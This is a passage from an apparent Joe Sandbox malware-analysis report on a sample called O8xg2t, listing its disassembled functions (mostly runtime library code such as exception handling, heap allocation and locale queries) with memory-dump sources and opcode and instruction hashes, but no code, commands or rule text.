                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                  • String ID:
                                  • API String ID: 1269745586-0
                                  • Opcode ID: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                  • Instruction ID: e2ab3ef72b7f240c54b21dbf897bf6525f512fe4427dd1c0d247b710ac710d4c
                                  • Opcode Fuzzy Hash: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                  • Instruction Fuzzy Hash: 53115972608B8186D7129F62F8407CE77B0FB89B91F854122EB8A43765EF3DC845CB00
                                  Function 00007FFBC32076E0 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                  • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                  • String ID:
                                  • API String ID: 1239891234-0
                                  • Opcode ID: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                  • Instruction ID: 4afa9733bd0a601e8ff2b8ecf524a7740c782461be4c4e5144c9758b0d8b4531
                                  • Opcode Fuzzy Hash: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                  • Instruction Fuzzy Hash: 35318F72618B8186DF60DF34E840AAE73A4FB88794F980136EA8D57B55DF3CD549CB00
                                  Function 000000014000A370 Relevance: 7.5, APIs: 5, Instructions: 41timethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                  • String ID:
                                  • API String ID: 1445889803-0
                                  • Opcode ID: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                  • Instruction ID: 72e860a1e5610cf2f60718b33953b9e9cfa3de8eae9ff42976e828aecb981d5d
                                  • Opcode Fuzzy Hash: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                  • Instruction Fuzzy Hash: 4101F775255B4082EB928F26F9403957360F74EBA0F456220FFAE4B7B4DA3DCA958700
                                  Function 0000000140004630 Relevance: 5.1, APIs: 4, Instructions: 80memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046B0
                                  • HeapReAlloc.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046C1
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$AllocProcess
                                  • String ID:
                                  • API String ID: 1617791916-0
                                  • Opcode ID: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                  • Instruction ID: 02c5a1d02253778f48d8bcd65850d79aa5baad65f26a42f950a3123f4edab52d
                                  • Opcode Fuzzy Hash: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                  • Instruction Fuzzy Hash: CB31D1B2715A8082EB06CF57F44039863A0F74DBC4F584025EF5D57B69EB39C8A28704
                                  Function 00000001400106B0 Relevance: 4.5, APIs: 3, Instructions: 47COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled$CaptureContext
                                  • String ID:
                                  • API String ID: 2202868296-0
                                  • Opcode ID: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                                  • Instruction ID: a6869a7b9d4117274e99734abe304e52ce4a6a571683f9898e15e7d65764808a
                                  • Opcode Fuzzy Hash: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                                  • Instruction Fuzzy Hash: 44014C31218A8482E7269B62F4543DA62A0FBCD385F440129B78E0B6F6DF3DC544CB01
                                  Function 00007FFBC3210248 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                  • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ExceptionRaise_clrfp
                                  • String ID:
                                  • API String ID: 15204871-0
                                  • Opcode ID: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                                  • Instruction ID: 6fcbd9363a8492b1145fe2c23ead6b395b885e5e36e3b060233b142135708869
                                  • Opcode Fuzzy Hash: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                                  • Instruction Fuzzy Hash: 80B17CB3600B898BEB15CF39C5867ADBBA0F744B48F58C921DA5D877A8CB39D851D700
                                  Function 00000001400103D0 Relevance: 3.2, APIs: 2, Instructions: 183COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ByteCharErrorLastMultiWide
                                  • String ID:
                                  • API String ID: 203985260-0
                                  • Opcode ID: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                                  • Instruction ID: 2a1840496c7657cf23b6901bcaaf21815035fe120b0a860a82176d8039cbaff9
                                  • Opcode Fuzzy Hash: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                                  • Instruction Fuzzy Hash: C871DF72A04AA086F7A3DF12E441BDA72A1F78CBD4F148121FF880B7A5DB798851CB10
                                  Function 0000000140010CF0 Relevance: 3.1, APIs: 2, Instructions: 82COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                                  • Instruction ID: 31705e6bd3fe747407dbe92e60a9b5f63bdbefd7c066999fadf2412e4a74ef82
                                  • Opcode Fuzzy Hash: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                                  • Instruction Fuzzy Hash: BD312B3260066442F723AF77F845BDE7651AB987E0F254224BB690B7F2CFB9C4418300
                                  Function 00007FFBC320A1B8 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                  • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                                  • Instruction ID: 752b30ee6a74ca8a5fb752e5dad1cfac5da2586f03e9423cee0e9e56ae9a8e29
                                  • Opcode Fuzzy Hash: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                                  • Instruction Fuzzy Hash: AF51C6B2B0868185EF20EF76E8449AF7BA4BB44B94F984135EE5D3BA95CE3CD405C700
                                  Function 0000000140011270 Relevance: 1.6, APIs: 1, Instructions: 84COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: EntryFunctionLookup
                                  • String ID:
                                  • API String ID: 3852435196-0
                                  • Opcode ID: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                                  • Instruction ID: 0a16dca171e58903ec1b218c91cdb1b04bf095347935d32e98aab42d926b4c07
                                  • Opcode Fuzzy Hash: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                                  • Instruction Fuzzy Hash: 7A316D33700A5482DB15CF16F484BA9B724F788BE8F868102EF2D47B99EB35D592C704
                                  Function 000000014000DDD9 Relevance: 1.6, Strings: 1, Instructions: 301COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID: 0-3916222277
                                  • Opcode ID: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                                  • Instruction ID: 9b910ad21b0c4e6c2a4c619a0863cbecb71c4e07d0bd79d978466706db7fd7a1
                                  • Opcode Fuzzy Hash: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                                  • Instruction Fuzzy Hash: 2FD1DEF25087C486F7A2DE16B5083AABAA0F7593E4F240115FF9527AF5E779C884CB40
                                  Function 000000014000F370 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID:
                                  • API String ID: 2299586839-0
                                  • Opcode ID: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                                  • Instruction ID: a72933d7652eee1ce42449f64e4370b365fbcbea739f10b8ca5cd41f8ceea018
                                  • Opcode Fuzzy Hash: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                                  • Instruction Fuzzy Hash: EDF0FEF261468085EA62EB22B4123DA6750A79D7A8F800216FB9D476BADE3DC2558A00
                                  Function 000000014000E178 Relevance: 1.5, Strings: 1, Instructions: 260COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: -
                                  • API String ID: 0-2547889144
                                  • Opcode ID: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                                  • Instruction ID: 5aef184856849f1d0e814b0a8e39d0e8e949ccad25035a2bf8530ae42cfb47ec
                                  • Opcode Fuzzy Hash: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                                  • Instruction Fuzzy Hash: 5CB1CFF36086C482F7A6CE16B6083AABAA5F7597D4F240115FF4973AF4D779C8808B00
                                  Function 000000014000DFFE Relevance: 1.5, Strings: 1, Instructions: 256COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: -
                                  • API String ID: 0-2547889144
                                  • Opcode ID: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                                  • Instruction ID: 5cc8c865c9461daf8b0756d8ed2731e20d175c685145385c3f78aef56f479fea
                                  • Opcode Fuzzy Hash: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                                  • Instruction Fuzzy Hash: 5FB1A0F26087C486F772CF16B5043AABAA1F7997D4F240115FF5923AE4DBB9C9848B40
                                  Function 00000001400092E0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled
                                  • String ID:
                                  • API String ID: 3192549508-0
                                  • Opcode ID: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                  • Instruction ID: 6026514bbd401dabfdc0327cb8eb2cc9cc42ab70edfd582905dc0376ef34508b
                                  • Opcode Fuzzy Hash: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                  • Instruction Fuzzy Hash: 37B09260A61400D1D605AF22AC8538022A0775C340FC00410E20986130DA3C819A8700
                                  Function 000000014000DEFB Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: -
                                  • API String ID: 0-2547889144
                                  • Opcode ID: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                                  • Instruction ID: f0a9775499ae8e11c0cd3741dc570bab2f5201344a81d2c1a5008a9dc88a1dca
                                  • Opcode Fuzzy Hash: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                                  • Instruction Fuzzy Hash: 7E91D4F2A047C485FBB2CE16B6083AA7AE0B7597E4F141516FF49236F4DB79C9448B40
                                  Function 000000014000DDFF Relevance: 1.4, Strings: 1, Instructions: 192COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: -
                                  • API String ID: 0-2547889144
                                  • Opcode ID: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                                  • Instruction ID: 8f8310eeb878d4aa74977829efb49c2c7de80d27e4d4fb150cd5d5e4432a17d7
                                  • Opcode Fuzzy Hash: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                                  • Instruction Fuzzy Hash: 51818FB26087C485F7B2CE16B5083AA7AA0F7997D8F141116FF45636F4DB79C984CB40
                                  Function 000000014000DE96 Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: -
                                  • API String ID: 0-2547889144
                                  • Opcode ID: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                                  • Instruction ID: f8efd74c2ac63e8556513dce229926bc74ff59f5ae5890729ffd39c1599aad0a
                                  • Opcode Fuzzy Hash: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                                  • Instruction Fuzzy Hash: BE81B0F2608BC486F7A2CE16B5083AA7AA1F7587E4F140515FF59236F4DB79C984CB40
                                  Function 000000014000CC00 Relevance: .1, Instructions: 89COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                                  • Instruction ID: 63b5043dbdffafa71f1ddaca105bc0afa02b2cba45448f866c4c658d1faf9303
                                  • Opcode Fuzzy Hash: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                                  • Instruction Fuzzy Hash: B031B0B262129045F317AF37F941FAE7652AB897E0F514626FF29477E2CA3C88028704
                                  Function 000000014000C2A0 Relevance: .1, Instructions: 89COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                                  • Instruction ID: b610fbdfd0d7c5655a75ac718b847164fa7f0802b4cc155a4829149d785d36e6
                                  • Opcode Fuzzy Hash: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                                  • Instruction Fuzzy Hash: FE317EB262129445F717AF37B942BAE7652AB887F0F519716BF39077E2CA7C88018710
                                  Function 00000001400110F0 Relevance: .1, Instructions: 78COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                                  • Instruction ID: e0c281a5a51834f3cf9ef76d9d4ef001c4a7356b2a993cafd714ca14a0116626
                                  • Opcode Fuzzy Hash: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                                  • Instruction Fuzzy Hash: F831E472A1029056F31BAF77F881BDEB652A7C87E0F655629BB190B7E3CA3D84008700
                                  Function 00007FFBC320FD40 Relevance: .0, Instructions: 32COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
